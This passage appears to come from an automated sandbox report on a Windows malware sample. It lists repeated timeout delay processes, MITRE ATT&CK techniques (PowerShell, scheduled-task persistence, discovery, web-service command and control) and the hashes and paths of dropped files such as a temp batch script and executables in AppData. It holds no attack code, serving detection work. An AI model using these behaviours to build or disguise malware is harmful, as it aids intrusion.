        PID:2168
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1636
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:5000
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3120
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2792
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4912
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2460
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:840
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2016
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3576
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3200
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2384
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1988
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1996
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4652
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1564
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1548
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2148
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3048
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3364
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1784
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2952
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3440
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1672
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2360
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2652
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:5104
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4864
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3168
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4804
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4648
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2564
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4816
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1452
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1856
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4056
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2292
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4292
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3972
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4852
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4324
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3648
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1012
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:2700
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3756
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4556
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:3140
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:3088
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:956
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1504
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:2312
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4444
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:1068
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:4036
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        Delays execution with timeout.exe
        
        PID:1464
    - - C:\Windows\system32\timeout.exe
        
        timeout /t 1
        5⤵
        
        PID:4916

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2768

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
aa0a32b11dca7b04f4cc5fe8c55cb357

SHA1
00e354fd0754a7d721a270cdc08f970b9a3f6605

SHA256
e336a593bd31921c46757a88a99759f6a33854d0c8b854c0c8f118e5cede1ea1

SHA512
1db91d3540da2c7eb4e151d698f3a9c1d2caed3161c41f1c2c73781a65e9dfc818902f0220c0aa9fc2c617d4851f23f4a576c4e5fe0f40ec78e9ed01c8ad8b30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8f16eb240c6168b41004cca7306484e6

SHA1
da34df40f9b1d5b0f9fd49bd1d467879fb40cb06

SHA256
48c69824555f42932cc2a1272a03be650dde58a10239ba282e9314ec13ed273a

SHA512
96c4a859b024e531124139c28bebd4d6f53de3ae7bc378ea3c7662452525d4020d1a76f851651174418cae620c340e8677516a3a70933b2ff2cce6a71a349063

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b94a5f9c019b614942fc29d049e77006

SHA1
7d22a700e14c52c6ded2a26cc063057b779d5c2e

SHA256
ac01c39f1027c82f8d739b7a15c8fc17875bf33f3069f9acf0eb4a0d3b8803d7

SHA512
301825dd58920d02a28650c9bd9a43d36d5d896fa72b79b49792a868f2df4d419dd6fdfe245f544f8becaff9585e63050fe2e6979dbc35a592017423a392633e

Download Submit
C:\Users\Admin\AppData\Local\Temp\40A3.tmp\40A4.tmp\40A5.bat

Filesize
6KB

MD5
7c2813c2d85f5dc6281e3f76b7ac5ed3

SHA1
3ce69232b5730b55b525dde7b4611bae83b96d28

SHA256
bb7fefe731f0bb635ddd14035cf866aff119930a266b399222161134b0ca9ccc

SHA512
58d42382bae2f5d2648b51422ae15c01da9a30f13154599e5483ae8e0c91f8a24ff75c34143aa509a56298274f209ec49ea7630f385689845ad017d3a8d15009

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5gqdlfsm.yzr.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\ofwrombu.oy10.exe

Filesize
355KB

MD5
01a72f1659cfe71d56340773f3c89bf9

SHA1
b87d0a06df5896b9129efd823ea237905cfa9d1e

SHA256
7205faf5054589ce7dc6b68dcfea45c18859cb49a3c0d4bda840fc9d308152bd

SHA512
59e1de953a7bbb7f87da2de9c9575ba7c0098b31afc549c1eff2256ee9beddc590aec88d32716f386fd3a7037d610365d72bbded94278cd0d341ce337579d1e8

Download Submit
C:\Users\Admin\AppData\Roaming\ofwrombu.oy11.exe

Filesize
93KB

MD5
98120f502d3655b75750c82c8d5d09a1

SHA1
5615055aeba6fb30af8842034bc42691c1e880f4

SHA256
f0b01098938c057a8fa671500c38377aa396e60f713ecd482a2057d8b7877564

SHA512
c399842e363f3b96017d5c15bbe2c111d8bc6a15f0c917aa0c4f58ff1ccb642291e6963b48eb901585931955ea6d3be750c3d73298d0990fe8e52d18f09fa5ef

Download Submit
memory/1568-59-0x0000000000490000-0x00000000004FD000-memory.dmp

Filesize
436KB

Download
memory/1568-57-0x0000000075E60000-0x00000000760B2000-memory.dmp

Filesize
2.3MB

Download
memory/1568-31-0x0000000000490000-0x00000000004FD000-memory.dmp

Filesize
436KB

Download
memory/1568-53-0x00000000033D0000-0x00000000037D0000-memory.dmp

Filesize
4.0MB

Download
memory/1568-54-0x00000000033D0000-0x00000000037D0000-memory.dmp

Filesize
4.0MB

Download
memory/1568-55-0x00007FF86FD80000-0x00007FF86FF89000-memory.dmp

Filesize
2.0MB

Download
memory/2016-61-0x0000000002DA0000-0x00000000031A0000-memory.dmp

Filesize
4.0MB

Download
memory/2016-58-0x00000000010C0000-0x00000000010C9000-memory.dmp

Filesize
36KB

Download
memory/2016-62-0x00007FF86FD80000-0x00007FF86FF89000-memory.dmp

Filesize
2.0MB

Download
memory/2016-64-0x0000000075E60000-0x00000000760B2000-memory.dmp

Filesize
2.3MB

Download
memory/2768-0-0x00007FF84EE23000-0x00007FF84EE25000-memory.dmp

Filesize
8KB

Download
memory/2768-1-0x0000000000520000-0x0000000000528000-memory.dmp

Filesize
32KB

Download
memory/4504-14-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

Filesize
10.8MB

Download
memory/4504-40-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

Filesize
10.8MB

Download
memory/4504-16-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

Filesize
10.8MB

Download
memory/4504-15-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

Filesize
10.8MB

Download
memory/4504-13-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

Filesize
10.8MB

Download
memory/4504-12-0x00007FF84EE20000-0x00007FF84F8E2000-memory.dmp

Filesize
10.8MB

Download
memory/4504-3-0x000001C5EA5D0000-0x000001C5EA5F2000-memory.dmp

Filesize
136KB

Download